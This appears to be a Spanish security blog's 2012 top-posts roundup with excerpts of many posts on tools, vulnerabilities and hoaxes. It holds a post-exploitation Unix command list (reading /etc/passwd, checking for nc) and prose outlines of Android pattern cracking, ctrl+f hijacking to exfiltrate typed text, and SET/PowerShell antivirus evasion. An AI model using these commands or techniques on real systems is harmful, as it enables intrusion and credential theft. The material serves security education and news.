Lo más visto del 2012 en Hackplayers

En esta ocasión finalizamos también el año con un post con las 50 entradas de Hackplayers más vistas durante el 2012, según Google Analytics.

Como siempre, daros las gracias por leernos y participar con vuestros comentarios, soluciones a los retos y colaboraciones. No dudéis en contactar con nosotros si estáis interesados en algún tema en particular o si queréis participar con vuestro artículo. Nos vemos en el 2013. ¡Feliz y próspero año nuevo!
  1. hackplayers: Blogroll en español
  2. Sexting y hoax sobre alumnos de Deusto
  3. LOIC: la herramienta DDoS utilizada por Anonymous
  4. Caras "cachondas" en el chat de Facebook
  5. Whatsapp: cómo enviar una imagen con una vista previa falsa
  6. Reaver-wps: ataques de fuerza bruta contra WPS
  7. Tutoriales de Backtrack 5
  8. WhatsAppSniffer: captura fácilmente conversaciones de WhatsApp
  9. hackplayers: English Blogroll
  10. La 9ª de Anonymous compromete los sitios web de Capio Sanidad
  11. Taller de lock picking #3: Herramientas de ganzuado
  12. Recopilatorio de recursos de análisis de malware de Claus Valca
  13. Taller de lock picking #2: Técnicas de apertura
  14. WiFite: crackear redes wifi para dummies
  15. hackplayers: Retos de Hackplayers

UbnHD2 : un distribución de pentesting para móviles

Muchos de vosotros seguro que habéis pensado en convertir vuestro smartphone Android en un auténtica máquina de hacking. Algunos seguro que habéis instalado aplicaciones como ANTI, dSploit, FaceNiff, etc. y puede que incluso algún osado haya instalado la versión ARM de Metasploit.

Hoy vamos a ver otra solución para este propósito: UbnHD2, un SO basado en Ubuntu para pentesting que se ejecuta de forma nativa en un dispositivo HTC HD2. La distribución de momento está en fase beta y todavía hay algunas opciones que no funcionan. Puedes encontrar los pasos necesarios para la instalación en la página del desarrollador.

 

Características:

- Basado en Ubuntu 10.10 Maverick Meerkat, Kernel 2.6.32.15 (ARM)
- X.org 7.5, GNOME 2.32.0 & Cairo-Dock 2.2.0
- USB-OTG, 3G Network & WiFi (drivers no incluidos, proprietarios, cosulta el foro XDA)
- Perl 5.10.1, Ruby 4.5, Python 2.6.6 y más de 170 herramientas de Pentest precargadas

Descarga desde Sourceforge

Fuente: UbnHD2 : The Hacker News

Libro: Hacker Épico en pdf

Desde que recibí el libro Hacker Épico opté por paladearlo sólo durante los viajes diarios en tren hacia el trabajo, para hacerlos más amenos y cortos. Tanto es así que durante el segundo día de lectura me pasé dos paradas y ahora maldigo el momento en el que el tren llega puntual, o no sufre ningún percance, huelga,  incidencia o retraso porque es verdad que la trama te atrapa y no quieres parar de seguir leyendo. Es como cuando te enciendes un cigarro y justo viene el autobús, apenas das dos caladas y tienes que apagarlo...

De momento el principio promete, un libro en el que convergen una novela de intriga y un manual técnico como un Martini seco con vodka, agitado, no removido. Todo ello con el encanto de aquel que reconoce un entorno muy cercano, con una narrativa con múltiples guiños a una realidad que muchas veces supera la ficción, en el que cada investigación, prueba o reflexión del protagonista es una lección aprendida o por aprender, algunas sublimes. Es decir, una obra lúdico-didáctica como nunca había leído en castellano.

Vulnerabilidades en controladores gráficos de AMD y NVIDIA

El malware siempre o casi siempre se desarrolla para afectar y propagarse en el mayor número de equipos posible, simple economía de escala. Explotar vulnerabilidades en los controladores de los dos mayores fabricantes de tarjetas gráficas, AMD y NVIDIA, es cuanto menos una buena idea para mentes cabales y malvadas.

Hace algo más de una semana, AMD alertaba de un fallo de seguridad en la funcionalidad de actualización automática de su centro de control Catalyst. El propio fabricante instaba a sus usuarios a desactivar la opción “Comprobar automáticamente actualizaciones” y a no recibir avisos de nuevos drivers, al menos hasta principios del 2013. Así que toca actualizar los drivers directamente desde el sitio web amd.com.

Si por el contrario utilizas NVIDIA pues la situación no es tampoco demasiado alentadora. Un tal Peter Winter-Smith (Pedro para los amigos) acaba de publicar otro exploit para un fallo en NVIDIA Display Device server (NVVSVC), el servicio de los drivers de pantalla de Windows, que podría permitir a un usuario local o remoto obtener privilegios de administrador mediante un desbordamiento de pila. Ya se avisó de un fallo similar en los drivers de Linux en agosto que permitía también escalar privilegios...

En conclusión, tened en cuenta estos vectores de ataque y a punto vuestros sistemas fortificados (firewalls locales, permisos, etc.). Que no os coja desprevenidos el año 2013 ;)

Ejecución de código remoto en VLC Media Player

Uff! tras unos días en el limbo de lo absurdo os saludo lectores de hackplayers!!!. Ando un poco liado esquivando como puedo las estocadas del quinto jinete de la Apocalipsis... esta maldita crisis, la cual lleva unos cuantos años marchándose... pero seguimos teniéndola soplándonos a todos (o casi todos) detrás de la oreja, esperando un descuido para acabar de todas con la esperanza de curro, casa, jardín, perro...

Bueno, estaba yo en casa después de una jornada de trabajo, en el cual no sé si será por las fechas o porque donde tendríamos que estar nueve estamos seis, no me acabo de ver el culo. Cuando me ha llegado el humo de una noticia que me ha dejado algo intranquilo... 

Gracias a los chicos de Hispasec (los cuales han cambiado la estética de su página web... echarle un ojo... es un consejo a todos) os adjunto una noticia que cito textualmente:

"Se ha publicado una vulnerabilidad en el reproductor multimedia VLC Media Player que podría permitir la ejecución de código de forma remota.

La Web Oculta: Alguna vez pensaste por qué navegamos la web y no… nos sumergimos en ella?

Buenos protervos días/noches: “He venido hasta este blog de seguridad para tentarlos a todos, léanme bien porque yo soy su auténtico ‘Demontre Digital’. A qué forbidden site quieren ir??, yo los puedo llevar!! Me sobran proxy chains para el Deep Internet cruzar...me los llevaré a bailar el tango del placer, verán que no es lo mismo delirar que proceder…les toca decidir qué website quieren probar, mis tentaciones no son malas si las saben degustar….Háganme sentir bien: pórtense mal, conéctense a mi Darknet, sean mi pecado mortal. Ven qué fácil es mi diabólico amparo hallar?? Con permiso señor firewall lo voy a bypassear!!! Récenme queridos, cómprenme mi altar, porque en sus próximas cien vidas no se me van a zafar!! Será inútil expulsar a este demonio de ustedes, soy inmune al antivirus y no me iré sin infectar sus redes!! Yo soy aquel que explora en su navegador, soy Caín y soy Abel en su servidor.

Demontre Digital: qué espantosa compañía!! Déjenme troyanizarles el alma, para saber que sólo es mía…”   Oración para implorarle al Diablo Digital (o sea al redactor de este post) (A la oración se anexan 100 bitcoins y maldiciones de procedencia dudosa y no especificada).

**Espero que en algún momento de su vida hayan visto Matrix, en las siguientes líneas ustedes tendrán el papel de Neo y yo el de Morfeo, va? Ok…

Diablo Digital: Esta es su última oportunidad y su única. Después de esto no hay marcha atrás, pueden elegir cerrar la pestaña del navegador, la historia termina, continúan jugando Farmville en Facebook, y crean lo que quieran creer. Le dan click en Leer más, se quedan en el País de las Maravillas (bueno casi) y les enseñaré qué tan profundo es el agujero del conejo…

Qué hacer (inmediatamente) si tu cuenta de Twitter ha sido comprometida

Un día alguien te comenta "Creo que tienes un virus en tu cuenta de twitter" y acto seguido compruebas el timeline de tu cuenta: sí, te has convertido en un auténtico ventilador de mierda... y perdónenme la expresión, pero es lo menos que pensarás al comprobar que has tuiteado un montón de mensajes que no has escrito, sobretodo y curiosa antinomía, mensajes de productos para quitar centímetros a ellas y/o para dárselos a ellos XD. Aquí todo cabe, te has convertido en otro mensajero de la palabra de un spammer, tu cuenta de Twitter ha sido comprometida.
 

Error de permisos en telefonos Samsung Android (Exynos exploit)

Como muchos ya sabréis, se ha descubierto un fallo en los permisos establecidos para los procesadores Exynos 4210 y 4412 que usan algunos algunos teléfonos Samsung y que permite obtener un control total de los dispositivos con Android. 

Los detalles de la vulnerabilidad han salido a la luz en el foro de xda-developers y se debe fundamentalmente a que "/dev/exynos-mem" es de lectura/escritura para todos los usuarios del dispositivo. Simplemente un problema de establecimiento de permisos. Puesto que es posible acceder desde ahí a toda la memoria RAM del aparato (la RAM está mapeada tal cual), se puede parchear el kernel y "rootear" el dispositivo... o suponer un grave problema de seguridad. 

El error afecta a los Samsung con procesador 4210 y 4412: 

* Samsung Galaxy Note GT-N7000 
* Samsung Galaxy S2 GT-I9100 
* Samsung Galaxy S2 GT-I777 
* Samsung Galaxy S3 GT-I9300 
* Samsung Galaxy S3 GT-I9305 
* Samsung Galaxy Note 2 GT-N7100 
* Samsung Galaxy Note 2 GT-N7105 
* Samsung Galaxy Note 10.1 GT-N8000 
* Samsung Galaxy Note 10.1 GT-N8010 
* Meizu MX 

Nueva herramienta para descifrar BitLocker, PGP y TrueCrypt (Elcomsoft Forensic Disk Decryptor)

Todos conocemos herramientas como BitLocker, PGP y TrueCrypt que permiten cifrar particiones y/o discos enteros y que nos ofrecen una protección sólida y fiable para nuestros datos con una perfecta implementación de una criptografía fuerte.

Normalmente para acceder a los datos de estos contenedores cifrados debemos introducir una contraseña que debe ser larga y compleja para que no sea adivinable o fácilmente obtenible por medio de un ataque de fuerza bruta. Precisamente esto alimenta su única debilidad: el factor humano. Es decir, nadie va a andar escribiendo una contraseña cada vez que tenga que leer o escribir en un contenedor cifrado, y menos si ésta es larga y compleja...
Esto significa que las claves usadas para cifrar y descifrar datos tienen que poder ser leídas de la memoria del equipo y, obviamente, una herramienta de terceros podría llegar a capturarlas.

Elcomsoft Forensic Disk Decryptor puede obtener estas claves analizando un volcado de memoria realizado a través de una herramienta forense o adquirido mediante un ataque FireWire, incluso si el equipo está hibernado y no se han desmontado los volúmenes cifrados antes. Para ello utiliza algoritmos que localizan las áreas donde se encuentran las claves, analiza secuencias de bytes e incluso la estructura interna de los contenedores cifrados. Una vez obtenida la clave, puede descrifrar completamente el volúmen protegido o hacerlo en tiempo real montando una unidad en el sistema y permitiendo acceder a los datos de una forma más rápida y eficaz. Todo ello por 299€ :-O

Reboot (@reboot_film): tu mundo está a punto de ser reseteado - subtítulos disponibles

Reboot es un thriller cyberpunk cuyas bases se iniciaron con un crowd funding de Kickstarter. Se estrenó el pasado 12/12/12 (para deleite de los numerólogos), tras una campaña en la redes sociales y un trailer atrayente con algunos huevos de pascua, amén de una serie de retos con distintos niveles para jugar y un temática que seguro despertaron la curiosidad y el interés de aquellos relacionados sobretodo con la seguridad informática y la cultura hacker.
 
En la imagen Jesse, un hacker de sombrero negro con un oscuro objetivo...
 
La trama gira en torno a Stat, un personaje femenino que despierta literalmente con un iPhone pegado a su mano, con una enigmática cuenta atrás cuyo fin amenaza con afectar inexorablemente al elenco tecnológico que nos rodea y del que no hemos convertido irremediablemente dependientes. ¿Qué pasaría si todo esto dejara de funcionar? Esta y otras cuestiones son revisadas a lo largo de un juego de intriga que apenas dura 40 incesantes minutos bajo el objetivo de una Canon 5D en Los Ángeles.

Cómo comprometer el patrón de desbloqueo de Android

En la siguiente entrada veremos cómo obtener o eliminar un patrón de bloqueo de Android, siempre como prueba de concepto, así que nada de terminales robados ni de tomar prestado un momento el teléfono de la novia, que os conozco... XD

Como todos sabemos, en Android se utiliza ampliamente el patrón de grid en 3x3, en el que deberemos marcar un mínimo de cuatro puntos y en el que cada punto sólo puede ser utilizado una vez. Cada uno de estos puntos es indexado internamente de 1 a 9. Por ejemplo, en la imagen de la derecha el patrón de desbloqueo sería "2547896".

Este patrón se almacena como un hash SHA-1 en una cadena de bytes dentro del fichero /data/system/gesture.key. El problema es que Android no añade salt a los datos originales y, si tenemos en cuenta que tenemos un número finito de posibles patrones, crear y utilizar un diccionario de hashes válidos es algo muy trivial...

Obteniendo el patrón de desbloqueo

El fichero gesture.key se encuentra en un directorio que no es accesible normalmente, por lo que tendremos que acceder como root, es decir, el teléfono ha de encontrarse previamente rooteado. Además, para poder utilizar el SDK (adb) deberemos conectar el terminal a nuestro equipo y para ello tiene que estar activado el USB debugging. Si se dan estas dos circustancias los pasos son muy sencillos. A continuación veremos cómo hacerlo en un Windows 7 con un Samsung Galaxy S...

¿Y por qué el fin del mundo no podría ser el 19 de enero de 2038? Apocalipsis por un desbordamiento de entero...

Andaba yo trabajando, obteniendo informes de mi SIEM, cuando de repente al indicar el periodo de obtención de datos obtuve el siguiente error:


Mientras, en otras partes del mundo, esa fecha se sigue mostrando también en miles pantallas y seguro que a ti también te suena, ¿verdad?. Pero, ¿por qué 1 de enero de 1970?, veamos:

En la década de los 60, las primeras versiones de Unix medían el tiempo del sistema en intervalos de 1/60s, debido a los 60 Hz de la frecuencia de los osciladores en aquella época. Esto significaba que un entero sin signo de 32 bits sólo podía representar un lapso de tiempo inferior a 829 días. Por esta razón, el tiempo representado por el número 0 (llamado la época o epoch) tuvo que ser aplicado en el pasado muy reciente: 01/01/1971. De hecho, la primera edición del Manual del Programador de Unix del 3 de noviembre de 1971 define el tiempo Unix como "el tiempo desde las 00:00:00 de 1 de enero de 1971 medido en sexagésimos de segundo".

Más tarde, los intervalos se incrementaron a un segundo (1HZ DC), lo que aumentó el lapso de tiempo que podría ser representado a alrededor de 136 años y, como el periodo de representación era más amplio, el epoch se redondeó a 01/01/1970. Haciendo cálculos, un entero con signo de 32 bits puede representar números enteros entre -2147483648 y 2147483647, es decir, el rango representable en el tiempo Unix va desde las 20:45:52 GMT del 13 de diciembre de 1901 a 03:14:07 GMT del 19 de enero de 2038...

Comandos útiles de *nix para pen-testers/hackers

Hoy rescatamos una entrada de c0rrupt en la que se recopilan diversos comandos que nos serán útiles para la post-explotación de un sistema Linux/Unix. Como siempre, si conocéis cualquier otro y queréis compartirlo no dudéis en comentar!

BLIND FILES
/etc/resolv.conf (todos pueden leerlo sin alertar a un IDS)
/etc/motd, /etc/issue
/etc/passwd
SISTEMA
uname -a
ps aux
top -n 1 -b
id
arch
w
who -a
gcc -v
mysql --version
perl -v
ruby -v
python --version
df -k
mount
last -a
lastlog
lastlogin (*bsd)
getenforce
dmesg
lspci
lsusb
lshw
lshw -c network
free -m
cat /proc/cpuinfo
cat /proc/meminfo
du -h --max-depth=1 /
which nmap (ver si está ya instalado)
locate bin/nmap
which nc (ver si está ya instalado)
locate bin/
whoami
jps -l
java -version

Stuxnet: De la evolución de los virus informáticos a misiles nucleares o OMFG RUN FOR YOUR F*#*#*ING LIVES!!

“Miré, y vi un caballo bayo. El que lo montaba tenía por nombre Muerte, el Hades lo seguía, y el jinete usaba un Windows que arrojaba un Error Fatal con pantallazo azul rey para matar con incertidumbre, con 0day’s no parchados, con actualizaciones de Service Pack, y con las fieras de la tierra (y uno que otro “Press any key to continue”) …” Ap 6,8

Se aprecia claramente, en esta representación artística, como el horseman de la izquierda utiliza un system call que esparcirá el juicio final sobre la raza humana
Estimadísimos lectores, algunos sabrán que la fecha fatídica que marca el fin de los tiempos de acuerdo al calendario Maya está muy muy cerca, (obviamente todos aquí sabemos que el mundo se acabará este 21 de diciembre de 2012) y para no estar “out” armageddónicamente hablando, quise comenzar con esta cita TEXTUAL del Apocalipsis (un Apocalipsis Geek y por supuesto para evitar que me avienten a la Inquisición) que estoy seguro a más de uno nos ha hecho temblar de miedo en algún momento. Como me considero un exégeta consumado,  capaz de analizar cualquier texto dado sin hacer interpretaciones subjetivas al respecto, he de decirles que el versículo que cito profetiza algo más que un pantallazo azul en nuestra computadora y un freeze de monitor. Profetiza el advenimiento de ….la bestia (Raaawrr!).
Seguramente estarán pensando: por qué razón este tipo es tan locuaz al referirse a cualquier cosa de TI’s, y exagerado sobretodo. Primero porque está en mí calaña de computólogo y se me alborotan las neuronas en la sinapsis. Segundo, realmente lo que quise hacer con mi cita TEXTUAL, fue llamar poderosamente su atención para empezar a presentarles poco a poco lo poderoso justamente que es la bestia de mi título… en una especie de mmm digamos telenovela romántica dedicada a mis lectoras sensibles (o lectores uno nunca sabe [lo siento peques no puedo presentarlo bien con My Little Pony o Dora la Exploradora])…Y ya ustedes me dirán…
“Irán es una amenaza para el mundo…”  George W. Bush

SMS Spoofing Twitter

Hace unos días, Jonathan Rudenberg publicaba una vulnerabilidad en el sistema de publicación a través de SMS de Twitter que podría permitir el envío de tweets en nombre de otra persona con solo conocer su número de teléfono. El efecto de esta vulnerabilidad ya se conoce desde hace varios años.

Twitter dispone de una interfaz SMS con la que, a través de mensajes de texto, un usuario puede publicar actualizaciones y seguir a otros usuarios, entre otras opciones. Para activarla, es necesario enviar un nombre de usuario y contraseña a unos códigos telefónicos que la red social dispone a tal efecto. Una vez hecho esto, el número de teléfono queda asociado a la cuenta de Twitter.

Jonathan Rudenberg afirma en su blog que esa asociación puede ser utilizada para publicar un tweet en la cuenta de otra persona solo conociendo su número de teléfono. El fallo reside en que la interfaz de Twitter confía en la legitimidad del origen del SMS sin pedir ninguna autenticación adicional.

El número de origen de un SMS puede ser fácilmente falseado. Algunos proveedores permiten cambiar el origen del mensaje de texto, así que es posible que un tercero envíe un mensaje con el número de teléfono de la víctima como origen y que Twitter lo publique en su cuenta asociada.

El usuario puede entonces ejecutar todos los comandos disponibles a través de SMS sobre la cuenta de la víctima, entre lo que se incluye el envío de mensajes directos, respuesta a otros usuarios o incluso desactivar la cuenta por completo si se es usuario exclusivo a través de SMS.

mwcrawler: Script en python para descarga de malware o cómo tener tu propio zoo en casa

mwcrawler es un sencillo script en Python que parsea las URLs maliciosas de distintos repositorios conocidos (como por ej. MDL o Malc0de) para descargarse software malicioso. Muy útil para crear repositorios de malware y/o tener tu propio zoo en casa ;)

Actualmente el script parsea las siguientes URLs:

Requisitos:
BeautifulSoup 3.0.8 (las últimas versiones tienen problemas al parsear html): http://www.crummy.com/software/BeautifulSoup/

Uso:
$ python mwcrawler.py

Use '-t' for thug analysis $ python mwcrawler.py -t

Referencias:
mwcrawler - https://github.com/ricardo-dias/mwcrawler
thug repository - http://github.com/buffer/thug

La TV te vigila... (Samsung 0-day)

ReVuln Ltd., una pequeña compañía de seguridad encabezada por Donato Ferrante y Luigi Auriemma, publica un vídeo en el que se muestra el uso de uno de sus exploits que afecta a Smart TV, en este caso a un televisor Samsung LED 3D. En esta demostración veremos cómo es posible utilizar una vulnerabilidad de día 0 para recuperar información sensible, acceder con root, monitorizar y en definitiva controlar totalmente y de forma remota el dispositivo. Seguro que a partir de ahora, cuando estés sentando en el sillón de tu casa frente a tu TV pensarás: "quién está viendo a quién":

La ciberamenazas de 007: Operación Skyfall… ¿¿esas cosas no son de mentira??

Hace cuatro semanas más o menos que se estrenó la enésima película de James Bond, bautizada como Skyfall, la nueva entrega de mi agente socialité favorito, conquistador vehemente de mujeres, insuperable destructor de Aston Martin’s, Ferrari’s y Bugatti’s, y portador de un sinnúmero de gadgets irreales listos para salvarle el pellejo a “M” (su “M”),  al de su majestad, la reina de Inglaterra, y a Inglaterra entera.

En fin, dado que siempre he sido un gran fanático de esta franquicia, yo tenía muchas expectativas sobre este nuevo filme empezando por el tema musical de la misma, (a mi parecer bastante bueno) y sobretodo por el tipo de trama que manejaría. Según mi ser, y mi exigencia de cinéfilo berrinchudo,  dada la parafernalia global, el argumento tendría que ser una motivación exacta de los acontecimientos actuales y para mi gran entusiasmo así lo fue: En Skyfall, Bond aparece como una víctima más, mientras la CyberWar se desarrolla a su alrededor.

... Ahora se preguntará el sagaz lector: ¿qué diablos me quiere decir este individuo y por qué hace una especie redutio ad absurdum en menos de dos párrafos?  Bueno, bueno déjenme continuar mi diarrea mental y explicarles mi trenecito de ideas que no son fáciles de acomodar, en el siguiente ranteo.
Warning…Spoilers Coming

Robo de contraseñas mediante la suplantación de las barras de búsqueda de los navegadores (PoC js preventDefault)

Continuamente se publican en Internet listas de contraseñas de sitios comprometidos, amén de otro tipo de información delicada como números de tarjetas de crédito o cuentas bancarias. Seguro que en alguna ocasión habéis realizado una búsqueda mediante el navegador para comprobar que vuestra contraseña (o lo que sea) no se encuentra en esa enorme lista expuesta: pulsáis ctrl+f e introducís el texto en busca de coincidencias en la página y pensáis "total, como no introduzco mi contraseña en ningún formulario no hay peligro de que me la levanten"...

¡Error! Mediante Javascript es posible "secuestrar" el comando de búsqueda de cualquier navegador, de tal forma que podemos ejecutar un script malicioso al pulsar la combinación de teclas ctrl+f o
⌘+f. Esto se traduce en que podemos emular una barra de búsqueda falsa que sustituya a la barra real del navegador y a la hora de buscar el texto en la página todo lo que se escriba se mande a un servidor remoto.

Cómo añadir a nuestro servidor SSH un segundo factor de autenticación con Google Authenticator

En esta entrada veremos como añadir a nuestro servidor SSH un segundo factor de autenticación con Google Authenticator, de tal manera que cada vez que accedamos al servidor se nos solicite adicionalmente un código distinto que podremos obtener mediante la aplicación correspondiente de nuestro teléfono.

Google Authenticator está disponible para smartphones y cómo módulo PAM en Linux y es una implementación open source de TOTP (time-based one-time password) que utiliza un sencillo algoritmo que sólo requiere un reloj preciso y una contraseña compartida para generar un código válido sólo durante un pequeño espacio de tiempo.

A continuación veremos lo sencillo que resulta implementar este sistema en una distribución Linux, en nuestro caso BT5r3:

1. Instala libpam-google-authenticator:
add-apt-repository ppa:failshell/stable
apt-get update
apt-get install libpam-google-authenticator

Sexting y hoax sobre alumnos de Deusto

Seguro que todos habréis leído, escuchado en la radio o incluso visto en televisión el gran impacto mediático que está teniendo la noticia de unas supuestas filtraciones de varias fotos de alumnos de la Universidad de Deusto. Pero, ¿son veraces estas noticias o son puramente sensacionalistas? Pues me atrevería a decir más bien lo segundo...

Todos sabemos la fuerza que puede llegar a tener un bulo en Internet u hoax, más aún si tiene un componente de sexting en el que se publican fotos comprometidas.
Hasta el momento de escribir esta entrada todavía se podían descargar algunas de esas presuntas imágenes en 4chan, hasta un total de diez. Desconozco si son todas las que han estado circulando por WhatsApp y por distintas redes sociales, pero un análisis de los metadatos con la FOCA demuestra que algunas fueron tomadas hace bastante tiempo y con terminales o portátiles demasiado viejos, que difícilmente un alumno hubiera manteniendo hasta nuestros días:

 

Número 9 de la revista Hack In The Box


Ya podemos descargar el magazine número 9 de HITB, cuyos contenidos son los siguientes: 
 
Windows Security
- Bot Wars - The Game of Win32/64 System Takeover
- Memory Copy Functions in Local Windows Kernel Exploitation

Mobile Security
- Android Persistent Threats

Hardware Security
- Does the Analysis of Electrical Current Consumption of Embedded Systems could Lead to Code Reversing?

Web Application Security
- To Hack an ASP.Net Site? It is Difficult, but Possible!

Mobile Security
- A Brief Introduction to VEGA

Ocultando entornos virtuales a malware y atacantes

Si recordáis hace tiempo repasamos una serie de técnicas para que nuestro malware de cada día pudiera detectar que está "dentro" de una máquina virtual o en un sandbox y así ejecutar inmediatamente un rutina de escape para dejar con un palmo de narices a los analistas (o al menos a los analistas más noveles).

Ahora vamos a cambiarnos de chaqueta y vamos a ponernos en la piel de quién tiene que realizar el análisis del software malicioso. Si antes la pieza de malware intentaba detectar el entorno dónde estaba para engañarle y no seguir ejecutando sus malignas acciones, ahora es el propio entorno el que intentará engañar al malware y hacerle creer que está campando a sus anchas en el sistema operativo de su víctima inocente.

Para ello nos viene al pelo un breve post de Hexacorn en el que se describen algunas maneras de ocultar que el sistema es realmente una máquina virtual (principalmente VMWare). Por supuesto no son las únicas medidas que se pueden tomar, pero es un excelente comienzo para ocultar ficheros, procesos, servicios y claves de registro de cara a evadir los controles anti-VM de algunos tipos de malware.

Gana un Nexus 7 con la frase más ingeniosa sobre hacking e (in)seguridad informática #MUSIConcursoN7

MUSI, el Máster Universitario en Seguridad de la Información de la Universidad de Deusto, organiza un concurso a través de redes sociales para regalar un Nexus 7 de 16gb a aquel usuario que haga el comentario más gracioso/interesante siempre relacionado con la seguridad. Las bases son muy sencillas:

1.    Para poder ser seleccionable, debe de existir una relación directa entre MUSI y el perfil del concursante en las redes sociales (follower en twitter, “Me gusta” en Facebook y/o seguidor en Google+).

2.    Para participar es necesario que el usuario comparta la publicación en la que se da a conocer el concurso de forma pública y verificable.

3.  También es necesario realizar o compartir una publicación en la red social relacionada con la temática de la seguridad. Para recopilar todas las publicaciones se utilizará el hashtag #MUSIConcursoN7. Todas aquellas publicaciones que no lo lleven no entrarán en el concurso.


Ejemplo: "Cuando un servidor tiene una vulnerabilidad, se puede parchear. Aún no se ha inventado el parche para la estupidez humana  #MUSIConcursoN7@loretahur

Denegacion de servicio en Call Of Duty: Modern Warfare 3

Se ha descubierto una vulnerabilidad en el juego Call Of Duty: Modern Warfare 3 (CoDMW3) que podría provocar una denegación de servicio en los servidores públicos y privados utilizados para el modo multijugador, además de un problema de ejecución de código en el motor gráfico CryENGINE 3.

En la reciente conferencia de seguridad Power of Community (POC2012) de Seúl, varios especialistas de ReVuln presentaron varios fallos de seguridad en múltiples juegos on-line. 

Por ejemplo, ReVuln dice que logró comprometer una computadora explotando un bug en el juego Nexuiz. Sin embargo, la compañía aún no ha publicado detalles sobre las vulnerabilidades encontradas, sólo un video para demostrar que el exploit hecho a medida es funcional. 

De acuerdo con ReVuln, los fallos están dentro de CryENGINE 3, un motor de videojuegos que es usado por Nexuiz y muchos otros juegos. Esto significa que otros juegos que están basados en CryENGINE 3 también podrían ser potencialmente afectados.

Como parte de su presentación, los investigadores de seguridad también demostraron como un 0-day un ataque de denegación de servicio (DoS) al servidor del popular juego de PC Call Of Duty: Modern Warfare 3.

Evasión de antivirus con SET y Powershell

Hoy vamos a ver una interesante característica de SET (Social Engineering Toolkit) que nos permitirá obtener fácilmente un shell remoto evadiendo completamente el antivirus mediante un ataque con Windows PowerShell.

La ventaja de Powershell es que podemos añadir clases personalizadas al framework .NET. Mediante el cmdlet 'Add-Type' podemos compilar código CSharp al vuelo y por lo tanto importar funciones desde cualquier DLL. ¿Y para qué?, pues como el framework .NET no permite referenciar directamente la memoria, podemos importar funciones que si lo hagan, copiar un shellcode y ejecutarlo }:). Veamos como llevarlo a cabo:

Lo primero que haremos es actualizar nuestro Metasploit (msfupdate) y SET:
root@bt:/pentest/exploits/set# ./set-update 
[-] Updating the Social-Engineer Toolkit, be patient...
D    config/set_config.py
U    config/set_config
U    config/update_config.py
U    setup.py
A    src/fasttrack/delldrac.py
U    src/fasttrack/mssql.py
U    src/core/set.py
U    src/core/payloadgen/create_payloads.py
U    src/core/setcore.py
U    src/core/dictionaries.py
U    src/core/menu/text.py
U    src/core/fasttrack.py
U    src/html/spawn.py
U    src/html/Signed_Update.jar.orig
U    src/html/unsigned/verified_sign.py
U    src/html/unsigned/unsigned.jar
D    src/webattack/java_applet
U    src/webattack/multi_attack/multiattack.py
U    src/webattack/harvester/scraper.py
U    src/webattack/harvester/harvester.py
U    src/webattack/browser_exploits/gen_payload.py
D    src/webattack/web_clone/linux
D    src/webattack/web_clone/osx
A    src/webattack/web_clone/applet.txt
A    src/webattack/web_clone/applet.database.old
U    src/webattack/web_clone/applet.database
U    src/webattack/web_clone/cloner.py
U    src/webattack/web_clone/repeater.database
U    src/teensy/powershell_down.pde
A    src/teensy/peensy.pde
U    src/teensy/teensy.py
U    src/phishing/smtp/client/smtp_web.py
U    src/phishing/smtp/client/smtp_client.py
U    src/payloads/exe/shellcodeexec.binary
U    src/payloads/powershell/prep.py
U    src/payloads/set_payloads/downloader.windows
A    src/payloads/set_payloads/pyinjector_args.py
U    src/payloads/set_payloads/shell.py
U    src/payloads/set_payloads/shell.windows
A    src/payloads/set_payloads/pyinjector.binary
U    src/payloads/set_payloads/listener.py
U    set
U    readme/CHANGES
U    readme/CREDITS
Updated to revision 1577.
[*] The updating has finished, returning to main menu..

La página del Senado

Hace unas semanas el Senado español renovaba su página web. Muchos de nosotros nos llevamos las manos a la cabeza cuando vimos el pastizal que les había costado la paginita: 437.000 euros, por suponer una "inversión en democracia". Según los expertos no es mucho dinero para tratarse de una página de una institucion publica...

El proyecto, en el que el Senado lleva trabajando dos años, ha tenido un importe de adjudicación de 437.691,5 euros, incluido el IVA, repartidos entre el coste de la web (274.350 euros), el del buscador (115.404 euros) y el de las páginas temáticas de niños, jóvenes y la visita en 3D (47.937,5 euros). El contrato se formalizó en julio del año pasado y el trabajo tenía que haber estado terminado en seis meses, pero se ha ido retrasado hasta que el resultado se ha considerado bueno.

Un ingeniero anónimo ha creado un clon de la pagina en una semana y sin que le cueste un duro. Parapetado tras el pseudónimo de 'Tijuinem' es el autor del clon funcional de la nueva web del Senado, en la que se invirtieron 437.481 euros del dinero público. 'Tijuinem' explica en la documentación del proyecto que su única intención es demostrar, "por principios", que se podrían haber aprovechado las virtudes del 'open source' para reducir el coste general del desarrollo.

Como es natural, el grueso de la rebaja gira en torno al pago de licencias de software. La web clónica de la cámara alta, ya online aunque sin terminar, se vale de programas tan potentes como MySQL, Apache o LAMP que no solo igualan las prestaciones del mejor software comercial, sino que para muchos expertos las supera en determinados aspectos.

Haciendo el gamberro en intranet & hacking con dos piedras (2ª parte)

Como lo prometido es deuda y en hackplayers, pese a la crisis, se pagan las deudas, dado que la semana pasada os emplazamos a una segunda entrada de "haciendo el gamberro en intranet y hacking con dos piedras" muy gustosamente retomaremos la susodicha entrada.

Aunque hablar de un objetivo para este texto sería algo capcioso, pues dudo que valga para algo o alguien lo lea....XDXDXD en principio lo tiene, pretendemos divertirnos aprendiendo e intentar ver que se pueden hacer las cosas de muchísimas maneras ... incluso con lo justo sin demasiadas herramientas... a lo "old school" como diría un vetusto amigo.

En esta entrada dejaremos a un lado nuestro arsenal preconfigurado y desempolvaremos viejas herramientas que teníamos ya casi olvidadas... Vamos y no me saco el cpc464 porque no tiene tarjeta wireless :P y de paso veremos como pasar unas risillas a costa de nuestros vecinos de red.

En la entrada anterior no mencione ningún tipo de contramedida, pero en esta lo haremos. Desde la modesta opinión del que os habla y como diría mi abuelita "hay que saber hacer de to...!!!!".
La última vez que nos vimos (en el sentido figurado de la frase, claro está),
si mal no recuerdo, estábamos viendo como resetear sesiones establecidas muy a lo MacGyver, pero el objetivo era ver el porqué de las cosas.
También vimos un poco por encima los riesgos de dejar desprotegido el protocolo ARP.


Vamos a empezar si os parece comentando un par de contramedidas y luego seguimos...

Ataques SSRF y sockets: buffet de vulnerabilidades

Imagina que tienes dos sistemas (sistema A y sistema B) que confían entre sí, es decir, que la comunicación entre ellos no está bloqueada por un firewall porque se tienen que transferir datos desde un sistema a otro. El sistema A es, por ejemplo, un portal corporativo accesible desde una red insegura como es Internet. El otro sistema es un ERP al que no se puede acceder directamente desde Internet, pero que confía en el portal corporativo. Este es el esquema típico en una empresa...

